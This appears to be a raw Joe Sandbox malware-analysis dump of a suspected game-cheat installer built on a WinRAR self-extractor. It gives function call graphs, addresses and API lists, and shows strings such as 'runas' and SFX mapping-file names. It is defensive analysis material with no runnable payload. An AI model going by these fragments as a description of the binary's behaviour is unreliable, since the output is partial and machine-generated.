28419->28418 28516 7ff754572c80 28419->28516 28422 7ff75457cdcc 28421->28422 28423 7ff75457cdeb 28421->28423 28422->28423 28591 7ff754541120 28422->28591 28423->28400 28426 7ff754573cf0 __scrt_get_show_window_mode 28425->28426 28427 7ff7545732d3 GetStartupInfoW 28426->28427 28427->28401 28429 7ff754580730 48 API calls 28428->28429 28430 7ff75457cd2f 28429->28430 28432 7ff754572e5e 28430->28432 28596 7ff754580ac0 35 API calls swprintf 28430->28596 28433 7ff754570754 28432->28433 28597 7ff75455dfd0 28433->28597 28436 7ff7545562dc 35 API calls 28437 7ff75457079a 28436->28437 28674 7ff75456946c 28437->28674 28439 7ff7545707a4 __scrt_get_show_window_mode 28679 7ff754569a14 28439->28679 28441 7ff754570ddc 28442 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 28441->28442 28444 7ff754570de2 28442->28444 28443 7ff75457096e GetCommandLineW 28445 7ff754570b42 28443->28445 28446 7ff754570980 28443->28446 28449 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 28444->28449 28448 7ff754556454 34 API calls 28445->28448 28451 7ff75454129c 33 API calls 28446->28451 28447 7ff754570819 28447->28441 28447->28443 28450 7ff754570b51 28448->28450 28459 7ff754570de8 28449->28459 28454 7ff754541fa0 31 API calls 28450->28454 28458 7ff754570b68 BuildCatchObjectHelperInternal 28450->28458 28453 7ff7545709a5 28451->28453 28452 7ff754541fa0 31 API calls 28456 7ff754570b93 SetEnvironmentVariableW GetLocalTime 28452->28456 28720 7ff75456cad0 103 API calls 3 library calls 28453->28720 28454->28458 28455 7ff754571900 _com_raise_error 14 API calls 28455->28459 28460 7ff754553e28 swprintf 46 API calls 28456->28460 28458->28452 28459->28455 28462 7ff754570c18 SetEnvironmentVariableW GetModuleHandleW LoadIconW 28460->28462 28461 7ff7545709af 28461->28444 28464 7ff754570adb 28461->28464 28465 7ff7545709f9 OpenFileMappingW 28461->28465 28689 7ff75456b014 LoadBitmapW 28462->28689 28471 7ff75454129c 33 API calls 28464->28471 28466 7ff754570a19 MapViewOfFile 28465->28466 28467 7ff754570ad0 CloseHandle 28465->28467 28466->28467 28469 7ff754570a3f UnmapViewOfFile MapViewOfFile 28466->28469 28467->28445 28469->28467 28472 7ff754570a71 28469->28472 28474 7ff754570b00 28471->28474 28721 7ff75456a190 33 API calls 2 library calls 28472->28721 28473 7ff754570c75 28713 7ff7545667b4 28473->28713 28725 7ff75456fd0c 35 API calls 2 library calls 28474->28725 28478 7ff754570a81 28722 7ff75456fd0c 35 API calls 2 library calls 28478->28722 28480 7ff754570b0a 28480->28445 28486 7ff754570dd7 28480->28486 28482 7ff7545667b4 33 API calls 28484 7ff754570c87 DialogBoxParamW 28482->28484 28483 7ff754570a90 28723 7ff75455b9b4 102 API calls 28483->28723 28490 7ff754570cd3 28484->28490 28489 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 28486->28489 28487 7ff754570aa5 28724 7ff75455bb00 102 API calls 28487->28724 28489->28441 28492 7ff754570cec 28490->28492 28493 7ff754570ce6 Sleep 28490->28493 28491 7ff754570ab8 28495 7ff754570ac7 UnmapViewOfFile 28491->28495 28494 7ff754570cfa 28492->28494 28726 7ff754569f4c 49 API calls 2 library calls 28492->28726 28493->28492 28497 7ff754570d06 DeleteObject 28494->28497 28495->28467 28498 7ff754570d1f DeleteObject 28497->28498 28501 7ff754570d25 28497->28501 28498->28501 28499 7ff754570d5b 28727 7ff75456fe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 28499->28727 28501->28499 28503 7ff754570d6d 28501->28503 28502 7ff754570d60 CloseHandle 28502->28503 28716 7ff7545694e4 28503->28716 28508->28398 28511->28390 28512->28396 28514 7ff75457281e __scrt_dllmain_crt_thread_attach 28513->28514 28514->28414 28514->28415 28515->28414 28517 7ff754572c90 28516->28517 28533 7ff75457ce54 28517->28533 28519 7ff754572c9c 28539 7ff754572848 28519->28539 28522 7ff754572cb4 _RTC_Initialize 28531 7ff754572d09 28522->28531 28544 7ff7545729f8 28522->28544 28523 7ff754572d35 28523->28419 28525 7ff754572cc9 28547 7ff75457c2c0 28525->28547 28532 7ff754572d25 28531->28532 28576 7ff754573170 7 API calls 2 library calls 28531->28576 28532->28419 28534 7ff75457ce65 28533->28534 28536 7ff75457ce6d 28534->28536 28577 7ff75457d69c 15 API calls abort 28534->28577 28536->28519 28537 7ff75457ce7c 28578 7ff7545778e4 31 API calls _invalid_parameter_noinfo 28537->28578 28540 7ff754572859 28539->28540 28543 7ff75457285e __scrt_acquire_startup_lock 28539->28543 28540->28543 28579 7ff754573170 7 API calls 2 library calls 28540->28579 28542 7ff7545728d2 28543->28522 28580 7ff7545729bc 28544->28580 28546 7ff754572a01 28546->28525 28548 7ff75457c2de 28547->28548 28549 7ff75457c2f4 28547->28549 28585 7ff75457d69c 15 API calls abort 28548->28585 28551 7ff754580730 48 API calls 28549->28551 28553 7ff75457c2f9 GetModuleFileNameA 28551->28553 28552 7ff75457c2e3 28586 7ff7545778e4 31 API calls _invalid_parameter_noinfo 28552->28586 28555 7ff75457c326 28553->28555 28587 7ff75457c0a0 35 API calls 28555->28587 28556 7ff754572cd5 28556->28531 28575 7ff754573480 InitializeSListHead 28556->28575 28558 7ff75457c350 28588 7ff75457c25c 15 API calls 2 library calls 28558->28588 28560 7ff75457c366 28561 7ff75457c36e 28560->28561 28562 7ff75457c37f 28560->28562 28589 7ff75457d69c 15 API calls abort 28561->28589 28590 7ff75457c0a0 35 API calls 28562->28590 28565 7ff75457c373 28567 7ff75457d90c __free_lconv_mon 15 API calls 28565->28567 28566 7ff75457c39b 28566->28565 28568 7ff75457c3cb 28566->28568 28569 7ff75457c3e4 28566->28569 28567->28556 28570 7ff75457d90c __free_lconv_mon 15 API calls 28568->28570 28572 7ff75457d90c __free_lconv_mon 15 API calls 28569->28572 28571 7ff75457c3d4 28570->28571 28573 7ff75457d90c __free_lconv_mon 15 API calls 28571->28573 28572->28565 28574 7ff75457c3e0 28573->28574 28574->28556 28576->28523 28577->28537 28578->28536 28579->28542 28581 7ff7545729d6 28580->28581 28583 7ff7545729cf 28580->28583 28584 7ff75457caa0 34 API calls 28581->28584 28583->28546 28584->28583 28585->28552 28586->28556 28587->28558 28588->28560 28589->28565 28590->28566 28592 7ff7545491c8 35 API calls 28591->28592 28593 7ff754541130 28592->28593 28594 7ff7545729bc 34 API calls 28593->28594 28595 7ff754572a01 28594->28595 28595->28422 28596->28430 28728 7ff754572450 28597->28728 28600 7ff75455e07b 28604 7ff75455e503 28600->28604 28735 7ff75457b788 39 API calls 2 library calls 28600->28735 28601 7ff75455e026 GetProcAddress 28602 7ff75455e03b 28601->28602 28603 7ff75455e053 GetProcAddress 28601->28603 28602->28603 28603->28600 28606 7ff75455e068 28603->28606 28605 7ff754556454 34 API calls 28604->28605 28609 7ff75455e50c 28605->28609 28606->28600 28608 7ff75455e3b0 28608->28604 28610 7ff75455e3ba 28608->28610 28611 7ff754557df4 47 API calls 28609->28611 28612 7ff754556454 34 API calls 28610->28612 28640 7ff75455e51a 28611->28640 28613 7ff75455e3c3 CreateFileW 28612->28613 28614 7ff75455e403 SetFilePointer 28613->28614 28615 7ff75455e4f0 CloseHandle 28613->28615 28614->28615 28617 7ff75455e41c ReadFile 28614->28617 28618 7ff754541fa0 31 API calls 28615->28618 28617->28615 28619 7ff75455e444 28617->28619 28618->28604 28620 7ff75455e458 28619->28620 28621 7ff75455e800 28619->28621 28626 7ff75454129c 33 API calls 28620->28626 28741 7ff754572624 8 API calls 28621->28741 28623 7ff75455e53e CompareStringW 28623->28640 28624 7ff75454129c 33 API calls 28624->28640 28625 7ff75455e805 28630 7ff75455e48f 28626->28630 28627 7ff754558090 47 API calls 28627->28640 28628 7ff754541fa0 31 API calls 28628->28640 28633 7ff75455e4db 28630->28633 28736 7ff75455d0a0 33 API calls 28630->28736 28631 7ff75455e648 28737 7ff754557eb0 47 API calls 28631->28737 28632 7ff75455e7c2 28635 7ff754541fa0 31 API calls 28632->28635 28637 7ff754541fa0 31 API calls 28633->28637 28639 7ff75455e7cb 28635->28639 28636 7ff7545532bc 51 API calls 28636->28640 28641 7ff75455e4e5 28637->28641 28638 7ff75455e651 28642 7ff7545551a4 9 API calls 28638->28642 28644 7ff754541fa0 31 API calls 28639->28644 28640->28623 28640->28624 28640->28627 28640->28628 28640->28636 28647 7ff75455e5cc 28640->28647 28730 7ff7545551a4 28640->28730 28645 7ff754541fa0 31 API calls 28641->28645 28646 7ff75455e656 28642->28646 28643 7ff75454129c 33 API calls 28643->28647 28648 7ff75455e7d5 28644->28648 28645->28615 28649 7ff75455e706 28646->28649 28650 7ff75455e661 28646->28650 28647->28643 28651 7ff754558090 47 API calls 28647->28651 28656 7ff754541fa0 31 API calls 28647->28656 28660 7ff7545532bc 51 API calls 28647->28660 28665 7ff75455e63a 28647->28665 28652 7ff754572320 _handle_error 8 API calls 28648->28652 28653 7ff75455da98 48 API calls 28649->28653 28662 7ff75455aae0 48 API calls 28650->28662 28651->28647 28654 7ff75455e7e4 28652->28654 28655 7ff75455e74b AllocConsole 28653->28655 28654->28436 28657 7ff75455e755 GetCurrentProcessId AttachConsole 28655->28657 28658 7ff75455e6fb 28655->28658 28656->28647 28659 7ff75455e76c 28657->28659 28740 7ff7545419e0 31 API calls _invalid_parameter_noinfo_noreturn 28658->28740 28666 7ff75455e778 GetStdHandle WriteConsoleW Sleep FreeConsole 28659->28666 28660->28647 28664 7ff75455e6a5 28662->28664 28663 7ff75455e7b9 ExitProcess 28667 7ff75455da98 48 API calls 28664->28667 28665->28631 28665->28632 28666->28658 28668 7ff75455e6c3 28667->28668 28669 7ff75455aae0 48 API calls 28668->28669 28670 7ff75455e6ce 28669->28670 28738 7ff75455dc2c 33 API calls 28670->28738 28672 7ff75455e6da 28739 7ff7545419e0 31 API calls _invalid_parameter_noinfo_noreturn 28672->28739 28675 7ff75455dd88 28674->28675 28676 7ff754569481 OleInitialize 28675->28676 28677 7ff7545694a7 28676->28677 28678 7ff7545694cd SHGetMalloc 28677->28678 28678->28439 28680 7ff754569a49 28679->28680 28682 7ff754569a4e BuildCatchObjectHelperInternal 28679->28682 28681 7ff754541fa0 31 API calls 28680->28681 28681->28682 28683 7ff754541fa0 31 API calls 28682->28683 28685 7ff754569a7d BuildCatchObjectHelperInternal 28682->28685 28683->28685 28684 7ff754541fa0 31 API calls 28686 7ff754569aac BuildCatchObjectHelperInternal 28684->28686 28685->28684 28685->28686 28687 7ff754541fa0 31 API calls 28686->28687 28688 7ff754569adb BuildCatchObjectHelperInternal 28686->28688 28687->28688 28688->28447 28690 7ff75456b03e 28689->28690 28691 7ff75456b046 28689->28691 28742 7ff754568624 FindResourceW 28690->28742 28693 7ff75456b04e GetObjectW 28691->28693 28694 7ff75456b063 28691->28694 28693->28694 28695 7ff75456849c 4 API calls 28694->28695 28696 7ff75456b078 28695->28696 28697 7ff75456b0ce 28696->28697 28698 7ff75456b09e 28696->28698 28700 7ff754568624 10 API calls 28696->28700 28708 7ff7545598ac 28697->28708 28756 7ff754568504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28698->28756 28701 7ff75456b08a 28700->28701 28701->28698 28703 7ff75456b092 DeleteObject 28701->28703 28702 7ff75456b0a7 28704 7ff7545684cc 4 API calls 28702->28704 28703->28698 28705 7ff75456b0b2 28704->28705 28757 7ff754568df4 16 API calls _handle_error 28705->28757 28707 7ff75456b0bf DeleteObject 28707->28697 28758 7ff7545598dc 28708->28758 28710 7ff7545598ba 28825 7ff75455a43c GetModuleHandleW FindResourceW 28710->28825 28712 7ff7545598c2 28712->28473 28714 7ff7545721d0 33 API calls 28713->28714 28715 7ff7545667fa 28714->28715 28715->28482 28717 7ff754569501 28716->28717 28718 7ff75456950a OleUninitialize 28717->28718 28719 7ff7545ae330 28718->28719 28720->28461 28721->28478 28722->28483 28723->28487 28724->28491 28725->28480 28726->28494 28727->28502 28729 7ff75455dff4 GetModuleHandleW 28728->28729 28729->28600 28729->28601 28731 7ff7545551c8 GetVersionExW 28730->28731 28732 7ff7545551fb 28730->28732 28731->28732 28733 7ff754572320 _handle_error 8 API calls 28732->28733 28734 7ff754555228 28733->28734 28734->28640 28735->28608 28736->28630 28737->28638 28738->28672 28739->28658 28740->28663 28741->28625 28743 7ff75456879b 28742->28743 28744 7ff75456864f SizeofResource 28742->28744 28743->28691 28744->28743 28745 7ff754568669 LoadResource 28744->28745 28745->28743 28746 7ff754568682 LockResource 28745->28746 28746->28743 28747 7ff754568697 GlobalAlloc 28746->28747 28747->28743 28748 7ff7545686b8 GlobalLock 28747->28748 28749 7ff754568792 GlobalFree 28748->28749 28750 7ff7545686ca BuildCatchObjectHelperInternal 28748->28750 28749->28743 28751 7ff754568789 GlobalUnlock 28750->28751 28752 7ff7545686f6 GdipAlloc 28750->28752 28751->28749 28753 7ff75456870b 28752->28753 28753->28751 28754 7ff75456875a GdipCreateHBITMAPFromBitmap 28753->28754 28755 7ff754568772 28753->28755 28754->28755 28755->28751 28756->28702 28757->28707 28761 7ff7545598fe _snwprintf 28758->28761 28759 7ff754559973 28835 7ff7545568b0 48 API calls 28759->28835 28761->28759 28762 7ff754559a89 28761->28762 28765 7ff7545599fd 28762->28765 28767 7ff7545420b0 33 API calls 28762->28767 28763 7ff754541fa0 31 API calls 28763->28765 28764 7ff75455997d BuildCatchObjectHelperInternal 28764->28763 28766 7ff75455a42e 28764->28766 28770 7ff7545524c0 54 API calls 28765->28770 28768 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 28766->28768 28767->28765 28769 7ff75455a434 28768->28769 28772 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 28769->28772 28771 7ff754559a1a 28770->28771 28773 7ff754559a22 28771->28773 28780 7ff754559aad 28771->28780 28774 7ff75455a43a 28772->28774 28776 7ff75455204c 100 API calls 28773->28776 28775 7ff754559b17 28827 7ff75457a450 28775->28827 28778 7ff754559a2b 28776->28778 28778->28769 28781 7ff754559a66 28778->28781 28780->28775 28784 7ff754558e58 33 API calls 28780->28784 28783 7ff754572320 _handle_error 8 API calls 28781->28783 28782 7ff75457a450 31 API calls 28796 7ff754559b57 __vcrt_InitializeCriticalSectionEx 28782->28796 28785 7ff75455a40e 28783->28785 28784->28780 28785->28710 28786 7ff754559c89 28787 7ff754552aa0 101 API calls 28786->28787 28799 7ff754559d5c 28786->28799 28790 7ff754559ca1 28787->28790 28788 7ff754552bb0 101 API calls 28788->28796 28789 7ff7545528d0 104 API calls 28789->28796 28793 7ff7545528d0 104 API calls 28790->28793 28790->28799 28791 7ff754552aa0 101 API calls 28791->28796 28792 7ff75455204c 100 API calls 28794 7ff75455a3f5 28792->28794 28797 7ff754559cc9 28793->28797 28795 7ff754541fa0 31 API calls 28794->28795 28795->28781 28796->28786 28796->28788 28796->28789 28796->28791 28796->28799 28797->28799 28821 7ff754559cd7 __vcrt_InitializeCriticalSectionEx 28797->28821 28836 7ff754560bbc MultiByteToWideChar 28797->28836 28799->28792 28800 7ff75455a1ec 28810 7ff75455a2c2 28800->28810 28842 7ff75457cf90 31 API calls 2 library calls 28800->28842 28802 7ff75455a157 28802->28800 28839 7ff75457cf90 31 API calls 2 library calls 28802->28839 28803 7ff75455a14b 28803->28710 28806 7ff75455a249 28843 7ff75457b7bc 31 API calls _invalid_parameter_noinfo_noreturn 28806->28843 28807 7ff75455a3a2 28809 7ff75457a450 31 API calls 28807->28809 28808 7ff75455a2ae 28808->28810 28844 7ff754558cd0 33 API calls 2 library calls 28808->28844 28812 7ff75455a3cb 28809->28812 28810->28807 28817 7ff754558e58 33 API calls 28810->28817 28813 7ff75457a450 31 API calls 28812->28813 28813->28799 28815 7ff75455a16d 28840 7ff75457b7bc 31 API calls _invalid_parameter_noinfo_noreturn 28815->28840 28816 7ff75455a1d8 28816->28800 28841 7ff754558cd0 33 API calls 2 library calls 28816->28841 28817->28810 28818 7ff754560f68 WideCharToMultiByte 28818->28821 28820 7ff75455a429 28845 7ff754572624 8 API calls 28820->28845 28821->28799 28821->28800 28821->28802 28821->28803 28821->28818 28821->28820 28837 7ff75455aa88 45 API calls _snwprintf 28821->28837 28838 7ff75457a270 31 API calls 2 library calls 28821->28838 28826 7ff75455a468 28825->28826 28826->28712 28828 7ff75457a47d 28827->28828 28834 7ff75457a492 28828->28834 28846 7ff75457d69c 15 API calls abort 28828->28846 28830 7ff75457a487 28847 7ff7545778e4 31 API calls _invalid_parameter_noinfo 28830->28847 28831 7ff754572320 _handle_error 8 API calls 28833 7ff754559b37 28831->28833 28833->28782 28834->28831 28835->28764 28836->28821 28837->28821 28838->28821 28839->28815 28840->28816 28841->28800 28842->28806 28843->28808 28844->28810 28845->28766 28846->28830 28847->28834 25802 7ff75457c438 25803 7ff75457c44d 25802->25803 25804 7ff75457c451 25802->25804 25814 7ff754580730 25804->25814 25809 7ff75457c463 25812 7ff75457d90c __free_lconv_mon 15 API calls 25809->25812 25811 7ff75457c470 25831 7ff75457d90c 25811->25831 25812->25803 25815 7ff75458073d 25814->25815 25816 7ff75457c456 25814->25816 25837 7ff754580570 48 API calls 5 library calls 25815->25837 25818 7ff754580b78 GetEnvironmentStringsW 25816->25818 25819 7ff754580ba6 WideCharToMultiByte 25818->25819 25829 7ff754580c4a 25818->25829 25823 7ff754580c00 25819->25823 25819->25829 25821 7ff75457c45b 25821->25809 25830 7ff75457c4a4 31 API calls 4 library calls 25821->25830 25822 7ff754580c54 FreeEnvironmentStringsW 25822->25821 25838 7ff75457d94c 25823->25838 25826 7ff754580c10 WideCharToMultiByte 25827 7ff754580c37 25826->25827 25828 7ff75457d90c __free_lconv_mon 15 API calls 25827->25828 25828->25829 25829->25821 25829->25822 25830->25811 25832 7ff75457d911 RtlRestoreThreadPreferredUILanguages 25831->25832 25836 7ff75457d941 __free_lconv_mon 25831->25836 25833 7ff75457d92c 25832->25833 25832->25836 25855 7ff75457d69c 15 API calls abort 25833->25855 25835 7ff75457d931 GetLastError 25835->25836 25836->25809 25837->25816 25839 7ff75457d997 25838->25839 25843 7ff75457d95b abort 25838->25843 25848 7ff75457d69c 15 API calls abort 25839->25848 25840 7ff75457d97e RtlAllocateHeap 25842 7ff75457d995 25840->25842 25840->25843 25842->25826 25842->25827 25843->25839 25843->25840 25845 7ff75457bbc0 25843->25845 25849 7ff75457bc00 25845->25849 25848->25842 25854 7ff75457f398 EnterCriticalSection 25849->25854 25855->25835 25861 7ff75457154b 25862 7ff7545714a2 25861->25862 25864 7ff754571900 25862->25864 25890 7ff754571558 25864->25890 25867 7ff75457198b 25868 7ff754571868 DloadReleaseSectionWriteAccess 6 API calls 25867->25868 25869 7ff754571998 RaiseException 25868->25869 25870 7ff754571bb5 25869->25870 25870->25862 25871 7ff7545719b4 25872 7ff754571a3d LoadLibraryExA 25871->25872 25873 7ff754571b85 25871->25873 25874 7ff754571aa9 25871->25874 25877 7ff754571abd 25871->25877 25872->25874 25875 7ff754571a54 GetLastError 25872->25875 25898 7ff754571868 25873->25898 25876 7ff754571ab4 FreeLibrary 25874->25876 25874->25877 25879 7ff754571a7e 25875->25879 25880 7ff754571a69 25875->25880 25876->25877 25877->25873 25878 7ff754571b1b GetProcAddress 25877->25878 25878->25873 25883 7ff754571b30 GetLastError 25878->25883 25882 7ff754571868 DloadReleaseSectionWriteAccess 6 API calls 25879->25882 25880->25874 25880->25879 25885 7ff754571a8b RaiseException 25882->25885 25884 7ff754571b45 25883->25884 25884->25873 25886 7ff754571868 DloadReleaseSectionWriteAccess 6 API calls 25884->25886 25885->25870 25887 7ff754571b67 RaiseException 25886->25887 25888 7ff754571558 _com_raise_error 6 API calls 25887->25888 25889 7ff754571b81 25888->25889 25889->25873 25891 7ff75457156e 25890->25891 25892 7ff7545715d3 25890->25892 25906 7ff754571604 25891->25906 25892->25867 25892->25871 25895 7ff7545715ce 25896 7ff754571604 DloadReleaseSectionWriteAccess 3 API calls 25895->25896 25896->25892 25899 7ff754571878 25898->25899 25905 7ff7545718d1 25898->25905 25900 7ff754571604 DloadReleaseSectionWriteAccess 3 API calls 25899->25900 25901 7ff75457187d 25900->25901 25902 7ff7545718cc 25901->25902 25903 7ff7545717d8 DloadProtectSection 3 API calls 25901->25903 25904 7ff754571604 DloadReleaseSectionWriteAccess 3 API calls 25902->25904 25903->25902 25904->25905 25905->25870 25907 7ff754571573 25906->25907 25908 7ff75457161f 25906->25908 25907->25895 25913 7ff7545717d8 25907->25913 25908->25907 25909 7ff754571624 GetModuleHandleW 25908->25909 25910 7ff75457163e GetProcAddress 25909->25910 25911 7ff754571639 25909->25911 25910->25911 25912 7ff754571653 GetProcAddress 25910->25912 25911->25907 25912->25911 25915 7ff7545717fa DloadProtectSection 25913->25915 25914 7ff75457183a VirtualProtect 25916 7ff754571802 25914->25916 25915->25914 25915->25916 25918 7ff7545716a4 VirtualQuery GetSystemInfo 25915->25918 25916->25895 25918->25914 28345 7ff75457bf2c 28352 7ff75457bc34 28345->28352 28357 7ff75457d440 GetLastError 28352->28357 28354 7ff75457bc3f 28378 7ff75457d068 35 API calls abort 28354->28378 28358 7ff75457d45d 28357->28358 28359 7ff75457d46a 28357->28359 28379 7ff75457f664 6 API calls __vcrt_uninitialize_ptd 28358->28379 28380 7ff75457fa04 15 API calls 2 library calls 28359->28380 28362 7ff75457d462 28362->28359 28364 7ff75457d4ab 28362->28364 28363 7ff75457d479 28365 7ff75457d481 28363->28365 28381 7ff75457f6bc 6 API calls __vcrt_uninitialize_ptd 28363->28381 28367 7ff75457d4c6 SetLastError 28364->28367 28368 7ff75457d4b0 SetLastError 28364->28368 28371 7ff75457d90c __free_lconv_mon 15 API calls 28365->28371 28383 7ff75457d068 35 API calls abort 28367->28383 28368->28354 28369 7ff75457d498 28369->28365 28372 7ff75457d49f 28369->28372 28374 7ff75457d488 28371->28374 28382 7ff75457d1f0 15 API calls abort 28372->28382 28374->28367 28376 7ff75457d4a4 28377 7ff75457d90c __free_lconv_mon 15 API calls 28376->28377 28377->28364 28379->28362 28380->28363 28381->28369 28382->28376 28319 7ff7545703e0 28320 7ff754570497 28319->28320 28321 7ff75457041f 28319->28321 28322 7ff75455aae0 48 API calls 28320->28322 28323 7ff75455aae0 48 API calls 28321->28323 28324 7ff7545704ab 28322->28324 28325 7ff754570433 28323->28325 28326 7ff75455da98 48 API calls 28324->28326 28327 7ff75455da98 48 API calls 28325->28327 28330 7ff754570442 BuildCatchObjectHelperInternal 28326->28330 28327->28330 28328 7ff754541fa0 31 API calls 28329 7ff754570541 28328->28329 28332 7ff75454250c SetDlgItemTextW 28329->28332 28330->28328 28331 7ff7545705c6 28330->28331 28339 7ff7545705cc 28330->28339 28334 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 28331->28334 28333 7ff754570556 SetDlgItemTextW 28332->28333 28337 7ff75457059c 28333->28337 28338 7ff75457056f 28333->28338 28334->28339 28335 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 28336 7ff7545705d2 28335->28336 28340 7ff754572320 _handle_error 8 API calls 28337->28340 28338->28337 28341 7ff7545705c1 28338->28341 28339->28335 28342 7ff7545705af 28340->28342 28343 7ff754577904 _invalid_parameter_noinfo_noreturn 31 API calls 28341->28343 28343->28331 28852 7ff7545720f0 28853 7ff754572106 _com_error::_com_error 28852->28853 28854 7ff754574078 Concurrency::cancel_current_task 2 API calls 28853->28854 28855 7ff754572117 28854->28855 28856 7ff754571900 _com_raise_error 14 API calls 28855->28856 28857 7ff754572163 28856->28857 25930 7ff7545711cf 25931 7ff754571102 25930->25931 25932 7ff754571900 _com_raise_error 14 API calls 25931->25932 25933 7ff754571141 25932->25933

                                                                                  Executed Functions

                                                                                  Function 00007FF75456B190 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
                                                                                  • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                  • API String ID: 3303814210-2702805183
                                                                                  • Opcode ID: d4d5e23c9f4b261c4c19f8130fee5323a8a410ce77bf06ef946c8267d964b253
                                                                                  • Instruction ID: b875569144687d97f3c24a63b94654fd35c1ee8e793f5d5d36167985a637787a
                                                                                  • Opcode Fuzzy Hash: d4d5e23c9f4b261c4c19f8130fee5323a8a410ce77bf06ef946c8267d964b253
                                                                                  • Instruction Fuzzy Hash: EBD27162A096C291FA21FF27E8F42F9A361FF85780FD84136D94D466A6DE3CE544C720
                                                                                  Function 00007FF75456CE88 Relevance: 65.0, APIs: 26, Strings: 10, Instructions: 1963fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
                                                                                  • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                  • API String ID: 1830998149-3916287355
                                                                                  • Opcode ID: e8e04c62f54770bedbb7c0e18cc69a2eaec3cac7609a0d283ef696123d8756e1
                                                                                  • Instruction ID: 83597fed61a698be5cec28bd01fdab254e7c0f81fd4850730face6613894e1fd
                                                                                  • Opcode Fuzzy Hash: e8e04c62f54770bedbb7c0e18cc69a2eaec3cac7609a0d283ef696123d8756e1
                                                                                  • Instruction Fuzzy Hash: B613A172B04B82A5EB10EF66D8E42EC67A1FB40398FD80535DA1D17AD9DF38E585C360
                                                                                  Function 00007FF754570754 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380filesleeptimeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1466 7ff754570754-7ff754570829 call 7ff75455dfd0 call 7ff7545562dc call 7ff75456946c call 7ff754573cf0 call 7ff754569a14 1477 7ff75457082b-7ff754570840 1466->1477 1478 7ff754570860-7ff754570883 1466->1478 1479 7ff75457085b call 7ff75457220c 1477->1479 1480 7ff754570842-7ff754570855 1477->1480 1481 7ff7545708ba-7ff7545708dd 1478->1481 1482 7ff754570885-7ff75457089a 1478->1482 1479->1478 1480->1479 1483 7ff754570ddd-7ff754570de2 call 7ff754577904 1480->1483 1487 7ff754570914-7ff754570937 1481->1487 1488 7ff7545708df-7ff7545708f4 1481->1488 1485 7ff75457089c-7ff7545708af 1482->1485 1486 7ff7545708b5 call 7ff75457220c 1482->1486 1502 7ff754570de3-7ff754570df0 call 7ff754577904 1483->1502 1485->1483 1485->1486 1486->1481 1493 7ff75457096e-7ff75457097a GetCommandLineW 1487->1493 1494 7ff754570939-7ff75457094e 1487->1494 1491 7ff7545708f6-7ff754570909 1488->1491 1492 7ff75457090f call 7ff75457220c 1488->1492 1491->1483 1491->1492 1492->1487 1496 7ff754570b47-7ff754570b5e call 7ff754556454 1493->1496 1497 7ff754570980-7ff7545709b7 call 7ff75457797c call 7ff75454129c call 7ff75456cad0 1493->1497 1499 7ff754570969 call 7ff75457220c 1494->1499 1500 7ff754570950-7ff754570963 1494->1500 1510 7ff754570b89-7ff754570ce4 call 7ff754541fa0 